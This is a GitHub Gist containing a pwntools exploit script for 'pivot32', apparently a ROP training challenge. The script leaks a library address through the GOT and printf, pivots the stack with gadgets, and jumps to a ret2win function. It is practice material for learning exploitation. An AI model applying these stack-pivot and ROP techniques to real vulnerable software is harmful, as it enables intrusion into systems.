Created
December 7, 2017 14:31
-
-
Save ywkw1717/ffa20ef8f205676332646f2bec4fce65 to your computer and use it in GitHub Desktop.
pivot32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
context(os="linux", arch="i386") | |
def main(): | |
conn = process('./pivot32') | |
elf = ELF('./pivot32') | |
pop_eax = 0x80488c0 | |
xchg_esp_eax = 0x80488c2 | |
# get pivot_addr | |
conn.recvuntil(": ") | |
pivot_addr = int(conn.recv(10), 16) | |
# first payload | |
payload = "" | |
payload += p32(elf.plt['foothold_function']) | |
payload += p32(elf.plt['printf']) | |
payload += p32(elf.symbols['main']) | |
payload += p32(elf.got['foothold_function']) | |
conn.sendline(payload) | |
# second payload | |
payload = "A" * 44 | |
payload += p32(pop_eax) | |
payload += p32(pivot_addr) | |
payload += p32(xchg_esp_eax) | |
conn.sendline(payload) | |
# get libc base address | |
conn.recvuntil("libpivot.so") | |
leak_libc = u32(conn.recv(4)) - 0x770 # 0x770 is offset of foothold_function | |
# second main routine | |
conn.sendline() | |
# third payload | |
payload = "A" * 44 | |
payload += p32(leak_libc + 0x967) # 0x967 is offset of ret2win | |
payload += "A" * 4 # pudding | |
conn.sendline(payload) | |
print conn.recvall() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment